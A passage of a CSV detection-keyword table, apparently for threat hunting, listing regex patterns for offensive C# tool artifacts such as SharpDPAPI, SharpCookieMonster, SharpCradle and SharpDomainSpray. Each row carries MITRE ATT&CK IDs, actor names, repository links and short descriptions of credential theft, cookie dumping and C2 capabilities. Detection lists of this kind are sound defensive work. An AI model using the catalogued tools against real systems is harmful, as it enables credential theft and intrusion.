Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.exe*",".{0,1000}SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpCloud.sln*",".{0,1000}SharpCloud\.sln.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud-master*",".{0,1000}SharpCloud\-master.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCOM.exe*",".{0,1000}SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpCOMManager.cs*",".{0,1000}SharpCOMManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sharpcompile*.exe*",".{0,1000}sharpcompile.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*sharpCompileHandler*",".{0,1000}sharpCompileHandler.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpCompileServer*",".{0,1000}SharpCompileServer.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpCompileServer.exe*",".{0,1000}SharpCompileServer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpConfigParser.dll*",".{0,1000}SharpConfigParser\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*sharpcookiemonster*",".{0,1000}sharpcookiemonster.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpCookieMonster*WebSocket4Net.dll*",".{0,1000}SharpCookieMonster.{0,1000}WebSocket4Net\.dll.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.csproj*",".{0,1000}SharpCookieMonster\.csproj.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.exe*",".{0,1000}SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpCookieMonster.exe*",".{0,1000}SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.sln*",".{0,1000}SharpCookieMonster\.sln.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonsterOriginal.exe*",".{0,1000}SharpCookieMonsterOriginal\.exe.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCradle*logonpasswords*",".{0,1000}SharpCradle.{0,1000}logonpasswords.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","276","60","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpCradle.exe*",".{0,1000}SharpCradle\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","276","60","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpCrashEventLog.exe*",".{0,1000}SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpDcomTrigger.exe*",".{0,1000}SharpDcomTrigger\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpDir.exe*",".{0,1000}SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpDllProxy*",".{0,1000}SharpDllProxy.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","7","663","81","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "*SharpDomainSpray*",".{0,1000}SharpDomainSpray.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDomainSpray.*",".{0,1000}SharpDomainSpray\..{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDomainSpray-master*",".{0,1000}SharpDomainSpray\-master.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDoor.exe*",".{0,1000}SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*SharpDoor-master*",".{0,1000}SharpDoor\-master.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*SharpDoor-master*",".{0,1000}SharpDoor\-master.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*SharpDPAPI backupkey*",".{0,1000}SharpDPAPI\sbackupkey.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI*",".{0,1000}SharpDPAPI.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpDPAPI* credentias *",".{0,1000}SharpDPAPI.{0,1000}\scredentias\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI* vaults *",".{0,1000}SharpDPAPI.{0,1000}\svaults\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.csproj*",".{0,1000}SharpDPAPI\.csproj.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.Domain*",".{0,1000}SharpDPAPI\.Domain.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.ps1*",".{0,1000}SharpDPAPI\.ps1.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.sln*",".{0,1000}SharpDPAPI\.sln.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPI.txt*",".{0,1000}SharpDPAPI\.txt.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDPAPIMachine*.cs",".{0,1000}SharpDPAPIMachine.{0,1000}\.cs","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpDPAPI-master*",".{0,1000}SharpDPAPI\-master.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpDXWebcam*",".{0,1000}SharpDXWebcam.{0,1000}","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","8","1","79","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z" "*sharpedrchecker*",".{0,1000}sharpedrchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - 